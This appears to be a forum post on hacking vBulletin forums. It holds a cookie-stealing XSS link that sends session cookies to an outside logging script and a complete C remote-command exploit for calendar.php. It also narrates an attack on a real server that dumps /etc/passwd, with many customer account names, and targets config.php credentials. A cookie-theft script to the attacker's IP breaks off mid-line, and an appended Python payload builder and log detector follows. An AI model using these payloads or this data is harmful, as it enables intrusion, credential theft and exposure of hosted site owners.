Admin
Subject: Hacking vBulletin forums    Saturday, March 27, 2010, 12:52 pm
Check whether the file calendar.php exists. If it does, enter this address, with these variables: 1- example.com: the site name. 2- <command>: any Linux command.

_____________________________________________ vBulletin 1 -------------------------------------------------------------------

Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

[link hidden: register on the forum to view it] http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E

(NOTE: The URL should be on one line.)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site HTML file:

<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>

And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired: the above link will proceed first to the memberlist with the cookie-stealing code, and then to [link hidden: register on the forum to view it]

With the recorded user id and password hash, we can access the site: [link hidden: register on the forum to view it] hash]

------------------------------------------------------------------------------
__________________________________ vBulletin 2

/*
 * vb_cal.c - vBulletin 2.0.3 and before calendar.php exploit
 *
 * gosper is credited with disclosing this to SecuriTeam on 9-24-02 along with a
 * working exploit, and he probably discovered it too. I wrote this because his
 * exploit didn't URL encode all the characters that needed to be URL encoded in
 * order for some of the inputted commands to work properly. I added a date
 * argument, which is essential for exploiting the security hole. I also used an
 * fdopen() and fgets() to make sure all the output was received and displayed
 * correctly, at least I hope it works better. The last thing I built in was HTTP
 * version 1.1 support so that you can use this against virtual hosts. Yeah...
 * and you can exploit this with a web browser too, it's just easier to use this
 * program, most of the time.
 *
 * Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
 * End of Days, sk3tch and all the people in #ozane (http://www.ozane.net/).
 * If I forgot you, well shit.
 *
 * Compile: gcc vbcal.c -o vbcal
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* The three fixed pieces of the request; the percent-encoded command goes
 * between url2 and url3. The injected `comma` value closes the double-quoted
 * PHP string in calendar.php, runs the command in backticks and die()s so
 * that only the command output comes back instead of the rest of the page. */
#define url1 "calendar.php?calbirthdays=1&action=getday&day="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"

/* SIGALRM handler: fires if connect() takes longer than -t seconds */
void time_out(int sig)
{
    (void)sig;
    printf("\ntimed out on connect()\n");
    exit(0);
}

void usage(char *prog)
{
    printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
    printf("\t The -h and -d arguments are required, the rest are optional.");
    printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
    printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
    printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
    printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
    printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
    exit(0);
}

int main(int argc, char *argv[])
{
    int c, x, sockfd, verbose = 0;
    int timeout = 10;            /* timeout for connect(), in seconds */
    int port = 80;               /* 80 default for HTTPD */
    char *path = "/";            /* url path, default = "/" */
    char *host = NULL, *date = NULL;
    char sign = '%';
    char *prog;
    char tmp[2];
    char tmp2[4];
    char cmd_buf[501];
    char encoded_cmd[1501];      /* worst case: every byte of cmd_buf becomes %XX */
    char data[2048];
    char output[20480];          /* 20k recv buf */
    struct sockaddr_in addr;
    struct hostent *he;
    struct sigaction action;
    FILE *f;

    memset(tmp, '\0', sizeof(tmp));
    memset(tmp2, '\0', sizeof(tmp2));
    memset(cmd_buf, '\0', sizeof(cmd_buf));
    memset(encoded_cmd, '\0', sizeof(encoded_cmd));
    memset(data, '\0', sizeof(data));
    memset(output, '\0', sizeof(output));

    prog = argv[0];
    fprintf(stderr, "\t ---[ vb_cal.c\n");
    fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
    fprintf(stderr, "\t ---[ c0ded by st0ic\n");
    fprintf(stderr, "\t ---[ [link hidden: register on the forum to view it]\n");

    if (argc < 5 || argc > 12)
        usage(prog);

    while ((c = getopt(argc, argv, "h:d:u:p:t:v")) != -1) {
        switch (c) {
        case 'h': host = optarg; break;            /* host */
        case 'd': date = optarg; break;            /* date with an event on it */
        case 'u': path = optarg; break;            /* url path */
        case 'p': port = atoi(optarg); break;      /* port */
        case 't': timeout = atoi(optarg); break;   /* connect timeout */
        case 'v': verbose = 1; break;
        default:  usage(prog);
        }
    }

    /* make sure we got the required stuff */
    if (host == NULL || date == NULL)
        usage(prog);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket()");
        exit(1);
    }
    if ((he = gethostbyname(host)) == NULL) {
        perror("gethostbyname()");
        exit(1);
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    addr.sin_port = htons(port);

    memset(&action, 0, sizeof(action));
    action.sa_handler = time_out;
    action.sa_flags = 0;
    sigaction(SIGALRM, &action, 0);

    alarm(timeout);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("connect()");
        exit(1);
    }
    alarm(0);

    printf("\\q to exit cmd prompt\n");
    while (1) {
        printf("cmd> ");
        if (fgets(cmd_buf, sizeof(cmd_buf), stdin) == NULL)
            break;
        cmd_buf[strcspn(cmd_buf, "\n")] = '\0';
        if (cmd_buf[0] == '\\' && cmd_buf[1] == 'q')
            exit(0);

        /* percent-encode everything that is not an ASCII letter or digit, so
         * that '/', '-', '|', '&', spaces etc. survive the query string */
        for (x = 0; x < (int)strlen(cmd_buf); x++) {
            unsigned char ch = (unsigned char)cmd_buf[x];
            if ((ch >= '0' && ch <= '9') || (ch >= 'A' && ch <= 'Z') || (ch >= 'a' && ch <= 'z')) {
                tmp[0] = (char)ch;
                strncat(encoded_cmd, tmp, sizeof(encoded_cmd) - strlen(encoded_cmd) - 1);
            } else {
                snprintf(tmp2, sizeof(tmp2), "%c%02X", sign, ch);
                strncat(encoded_cmd, tmp2, sizeof(encoded_cmd) - strlen(encoded_cmd) - 1);
            }
        }

        /* use HTTP/1.1 in order to send valid requests to virtual hosts;
         * Connection: close makes the server end the reply so fgets() sees EOF */
        snprintf(data, sizeof(data),
                 "GET %s%s%s%s%s%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n",
                 path, url1, date, url2, encoded_cmd, url3, host);

        /* be verbose about the string we're sending in case we need to debug */
        if (verbose == 1)
            printf("\nSending: %s", data);
        send(sockfd, data, strlen(data), 0);

        if ((f = fdopen(sockfd, "r+")) == NULL) {
            perror("fdopen()");
            exit(1);
        }
        /* print the whole response (headers included) until the server closes */
        while (fgets(output, sizeof(output), f) != NULL)
            printf("%s", output);
        fclose(f);

        memset(cmd_buf, '\0', sizeof(cmd_buf));
        memset(encoded_cmd, '\0', sizeof(encoded_cmd));
        memset(data, '\0', sizeof(data));
        memset(output, '\0', sizeof(output));

        /* one request per connection: reconnect for the next command */
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket()");
            exit(1);
        }
        alarm(timeout);
        if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
            perror("connect()");
            exit(1);
        }
        alarm(0);
    }
    return 0;
}

----------------------------------- vBulletin 3

Quote, originally posted by MAKS: (the same memberlist.php $letterbits text as given under vBulletin 1 above)

------------------------------------------------------------------------------
------------------------------------------------------------------------------

A vulnerability in vBulletin 2.0.3 forums

In the name of God, the Most Gracious, the Most Merciful.

What the vulnerability does is simple: it lets you execute commands on the machine, like a PHP shell. My friend and I went to the hacker's dearest friend, brother Google, and asked him to bring us sites running vBulletin 2.0.3. Of course Google did not let us down and gave us a list, so we picked one of them. The site was [not shown], and we applied the exploit. The form appeared, and in place of <command> we put the command we want. The first thing, we said let's find out who we are, so we put whoami, and what came out was [not shown]. I took it as a good sign; at least I am not nobody. So I said let me take a look at the password file and see the sites on the server, so I put cat /etc/passwd in place of <command> and it returned:

root0:0:root:/root:/bin/bash
bin1:1:bin:/bin:
daemon2:2:daemon:/sbin:
adm3:4:adm:/var/adm:
lp4:7:lp:/var/spool/lpd:
sync5:0:sync:/sbin:/bin/sync
shutdown6:0:shutdown:/sbin:/sbin/shutdown
halt7:0:halt:/sbin:/sbin/halt
mail8:12:mail:/var/spool/mail:
news9:13:news:/var/spool/news:
uucp10:14:uucp:/var/spool/uucp:
operator11:0perator:/root:
games12games:/usr/games:
gopher13:30:gopher:/usr/lib/gopher-data:
ftp14:50:FTP User:/home/ftp:
nobody99:99:Nobody:/:
gtd501:/home/gtd:/bin/bash
majordomo504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql497:/home/msql:/bin/bash
userquota503quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva514:516::/home/minerva:/bin/bash
taosfineart517:517::/home/taosfineart:/bin/bash
technoasylum518:518::/home/technoasylum:/bin/bash
ward-tech519:519::/home/ward-tech:/bin/bash
malio522:522::/home/malio:/bin/bash
cindyland529:529::/home/cindyland:/bin/bash
mathom-house532:532::/home/mathom-house:/bin/bash
libertywebhosting534:534::/home/libertywebhosting:/bin/bash
bonfiglioreed537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza539:539::/home/oldtymespizza:/bin/bash
dogshowjournal546:545::/home/dogshowjournal:/bin/bash
surfclassic550:549::/home/surfclassic:/bin/bash
thomason-development552:551::/home/thomason-development:/bin/bash
james553:534::/home/james:/bin/emailonly
alexr554:534::/home/alexr:/bin/emailonly
god555:522::/home/god:/bin/emailonly
sales556:522::/home/sales:/bin/bash
info557:522::/home/info:/bin/emailonly
ryugen558:552::/home/ryugen:/bin/bash
allanart566:559::/home/allanart:/bin/bash
womensphotoworks573:564::/home/womensphotoworks:/bin/bash
mbaentry576:567::/home/mbaentry:/bin/bash
omahasoaring577:568::/home/omahasoaring:/bin/bash
talvee582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices589:576::/home/mobilewashservices:/bin/bash
ocdeaf591:578::/home/ocdeaf:/bin/bash
foxfire-goldens592:579::/home/foxfire-goldens:/bin/bash
finchair594:580::/home/finchair:/bin/bash
americanabatement595:581::/home/americanabatement:/bin/bash
whiskersgraphics596:582::/home/whiskersgraphics:/bin/bash
ronemous604:568::/home/ronemous:/bin/emailonly
parrotranch605:588::/home/parrotranch:/bin/bash
erlefamily606:589::/home/erlefamily:/bin/ftponly
parduhn610:593::/home/parduhn:/bin/bash
riptideproductions616:596::/home/riptideproductions:/bin/bash
kaialece626:604::/home/kaialece:/bin/bash
zeeksystems627:605::/home/zeeksystems:/bin/bash
trevor630:596::/home/trevor:/bin/emailonly
dino631:522::/home/dino:/bin/emailonly
loconsigo632:608::/home/loconsigo:/bin/bash
delamerevineyard643:613::/home/delamerevineyard:/bin/bash
michael652:605::/home/michael:/bin/emailonly
jereme654:596::/home/jereme:/bin/emailonly
windows-tips655:624::/home/windows-tips:/bin/bash
ghost-ride657:626::/home/ghost-ride:/bin/bash
cprltd663:629::/home/cprltd:/bin/bash
batmanandbarbie673:636::/home/batmanandbarbie:/bin/bash
housegroove674:637::/home/housegroove:/bin/bash
washglass675:638::/home/washglass:/bin/bash
djmattson676:639::/home/djmattson:/bin/bash
statecapitols677:640::/home/statecapitols:/bin/bash
kanjiweb678:641::/home/kanjiweb:/bin/bash
freevg681:644::/home/freevg:/bin/bash
writersresource682:645::/home/writersresource:/bin/bash
evilgraphics684:647::/home/evilgraphics:/bin/bash
magdalenhsuli690:650::/home/magdalenhsuli:/bin/bash
antioch704:659::/home/antioch:/bin/bash
lifelinks705:660::/home/lifelinks:/bin/bash
sinecos707:662::/home/sinecos:/bin/bash
dosdonas711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse713:668::/home/accuratelegalprocessingse:/bin/bash
jc716:581::/home/jc:/bin/emailonly
jo717:581::/home/jo:/bin/emailonly
infoaai719:581::/home/infoaai:/bin/emailonly
gypsytejas721:671::/home/gypsytejas:/bin/bash
j-j-c724:674::/home/j-j-c:/bin/bash
camp726:660::/home/camp:/bin/emailonly
marinabaypark740:677::/home/marinabaypark:/bin/bash
gypsy741:671::/home/gypsy:/bin/emailonly
meg749:593::/home/meg:/bin/emailonly
huwe751:679::/home/huwe:/bin/bash
ultimateautomotive50753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher762:690::/home/videoteacher:/bin/bash
spiffydesign765:693::/home/spiffydesign:/bin/bash
nawaf766:694::/home/nawaf:/bin/bash
ccdump768:696::/home/ccdump:/bin/bash
drwizard-atlanta772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes777:705::/home/showme-powerchutes:/bin/bash
shellmandanceacademy778:706::/home/shellmandanceacademy:/bin/bash
samelec779:707::/home/samelec:/bin/bash
pet-odor780:708::/home/pet-odor:/bin/bash
michael1781:593::/home/michael1:/bin/emailonly
mmnursereview785:710::/home/mmnursereview:/bin/bash
franksland787:712::/home/franksland:/bin/bash
gr8gifts4u801:717::/home/gr8gifts4u:/bin/bash
globalintercultural806:718::/home/globalintercultural:/bin/bash
gotcher-belote807:719::/home/gotcher-belote:/bin/bash
francisengineering808:720::/home/francisengineering:/bin/bash
befree2814:726::/home/befree2:/bin/bash
barclay821:689::/home/barclay:/bin/emailonly
airupdate823:732::/home/airupdate:/bin/bash
stream825:734::/home/stream:/bin/bash
strantech826:735::/home/strantech:/bin/bash
newcityftp832:740::/home/newcityftp:/bin/bash
nagomifan833:741::/home/nagomifan:/bin/bash
gecko834:671::/home/gecko:/bin/emailonly
chooseyourlife838:745::/home/chooseyourlife:/bin/bash
binarytech839:746::/home/binarytech:/bin/bash

<<< Of course the whole passwd file is long, but I have put part of it so you can see it. >>>

Hmm, a good server; I saved a copy of it in my password-file library as a keepsake. Anyway, let's see what the story of the site is:

romulus2997:837::/home/romulus2:/bin/bash

Oooh, fancy, it gets to /bin/bash. Anyway, I thought about how we would get the password for this site. My friend told me to look at the shadow file; I told him not to bother, the shadow file is hidden these days, that was in the old days. So I said fine, let's look at the config, and God willing the site owner is stupid and used the same password as the one in the passwd file. I noticed that the directory is /home/romulus2, and another way is to type pwd; I typed it and got /home2/www/romulus2/forum, so that is the real location of the site's files. I added /admin/config.php to it, so the command became:

cat /home2/www/romulus2/forum/admin/config.php

_________________

Another method

Requirements: a server installed on your own computer + a web browser (Internet Explorer).
Level: intermediate.
Note: this method is not only for vBulletin!! You can try it on other kinds of forums.

The procedure is divided into several parts. First, some malicious scripts that steal cookies, in addition to making the forum accept data from the wrong place. The condition is that the forum must allow HTML code. Write a new thread or a reply (in a forum that supports HTML), then write any topic and paste this code between the lines:

<script>document.write('<img src="http://my_ip_address/'+document
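As an added example, not part of the original post and not MAKS's or st0ic's code: the Python below assembles the two request shapes this post describes (the calendar.php `comma` injection with the percent-encoding st0ic's tool is about, and the memberlist.php `letterbits` cookie-stealing URL) and, on the defender's side, checks combined-format access-log lines for both. The real URLs on this page are hidden by the forum, so the hosts, the collector URL and the log lines here are constructed for the example; the fixed request fragments are the url1/url2/url3 strings from vb_cal.c above.

```python
"""Added example: the two vBulletin payload shapes from this post, plus a log check."""
import re
from urllib.parse import quote, unquote, urlsplit

# The three fixed pieces of the calendar.php request, as in vb_cal.c above:
# the injected `comma` value closes a double-quoted PHP string, runs the
# command in backticks and die()s so only the command output comes back.
CAL_URL1 = "calendar.php?calbirthdays=1&action=getday&day="
CAL_URL2 = "&comma=%22;echo%20'';%20echo%20%60"
CAL_URL3 = "%60;die();echo%22"


def percent_encode(cmd: str) -> str:
    """Keep ASCII letters and digits, turn every other byte into %XX.

    This is st0ic's point about gosper's exploit: '/', '-', '|', '&' and
    spaces have to be encoded or they break the query string.
    """
    out = []
    for byte in cmd.encode("utf-8"):
        ch = chr(byte)
        out.append(ch if ch.isascii() and ch.isalnum() else "%%%02X" % byte)
    return "".join(out)


def calendar_injection_url(host: str, date: str, cmd: str,
                           path: str = "/", port: int = 80) -> str:
    """Assemble the GET target the C tool sends for one command.

    `date` must be a day that has an event on the board, otherwise calendar.php
    never reaches the injected code and just returns a normal HTML page.
    """
    if not path.endswith("/"):
        path += "/"
    netloc = host if port == 80 else f"{host}:{port}"
    return (f"http://{netloc}{path}{CAL_URL1}{date}"
            f"{CAL_URL2}{percent_encode(cmd)}{CAL_URL3}")


def letterbits_xss_url(forum_base: str, collector_url: str) -> str:
    """memberlist.php?letterbits=<script>location='COLLECTOR?cook='+escape(document.cookie)</script>

    Same shape as MAKS's payload; `collector_url` is the attacker's record.php
    (a constructed name here, not one from the post).
    """
    js = f"<script>location='{collector_url}?cook='+escape(document.cookie)</script>"
    return f"{forum_base.rstrip('/')}/memberlist.php?letterbits={quote(js, safe='')}"


# --- defender side ----------------------------------------------------------

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')


def query_params(query: str) -> dict:
    """Split a raw query string ourselves (parse_qs on older Pythons also
    splits on ';', which would hide the injected `comma` value) and decode."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def flag_request(log_line: str) -> list:
    """Return the rule names one combined-format access-log line matches."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    params = query_params(url.query)
    hits = []
    if script == "calendar.php" and any(
            re.search(r'[;`"]|die\(', v) for v in params.get("comma", [])):
        hits.append("vb-calendar-comma-injection")
    if script == "memberlist.php" and any(
            re.search(r"<\s*script|javascript:|\bon\w+\s*=", v, re.I)
            for v in params.get("letterbits", [])):
        hits.append("vb-memberlist-letterbits-xss")
    return hits


# Constructed sample log lines (not from the original post): two attacks, two benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Mar/2010:12:52:01 +0000] "GET /forum/' + CAL_URL1 + '2002-11-14'
    + CAL_URL2 + percent_encode('id') + CAL_URL3 + ' HTTP/1.1" 200 61',
    '10.0.0.9 - - [27/Mar/2010:12:53:10 +0000] "GET /forum/memberlist.php?letterbits='
    '%3Cscript%3Elocation%3D%27http%3A%2F%2Fattacker.example%2Frecord.php%3Fcook%3D%27'
    '%2Bescape%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 8123',
    '10.0.0.7 - - [27/Mar/2010:12:54:00 +0000] "GET /forum/calendar.php?calbirthdays=1'
    '&action=getday&day=2002-11-14 HTTP/1.1" 200 9001',
    '10.0.0.7 - - [27/Mar/2010:12:54:05 +0000] "GET /forum/memberlist.php?letterbits=A HTTP/1.1" 200 7000',
]


def scan(lines):
    """Map line index -> matched rules, for every line that matched anything."""
    return {i: flag_request(line) for i, line in enumerate(lines) if flag_request(line)}


if __name__ == "__main__":
    print(calendar_injection_url("192.168.1.2", "2002-11-14", "cat /etc/passwd"))
    print(letterbits_xss_url("http://forum.example", "http://attacker.example/record.php"))
    print(scan(SAMPLE_LOG))
```

The detector decodes the query before matching, because both payloads on this page arrive fully percent-encoded; matching the raw request line for `<script` or a backtick would miss them.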